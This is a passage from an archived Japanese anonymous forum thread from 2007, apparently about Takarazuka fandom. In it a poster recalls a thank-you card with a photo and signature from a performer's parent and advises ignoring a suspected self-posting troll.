生徒の写真が入っているからこそ嬉しいんだもの。

166 :名無しさん@花束いっぱい。:2007/01/11(木) 01:05:06 ID:P37+GbiZ
生徒の親からか…贔屓が下級生の頃にもらったことがある。
公演のお礼状で、生徒のの写真入り(生徒からのお礼状とはまったく別の写真)で生徒のサインも入ってた。
コメントだけ親が書いてて親の署名入り。住所は当然なし。
すごく得した気分だった〜。お付きがついた頃から来なくなったけどね。
>164
>162本人が自演しまくってるんだと思われ。
生徒の名前をだしといてあとで叩く…の繰り返し。
スルーが1番。

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)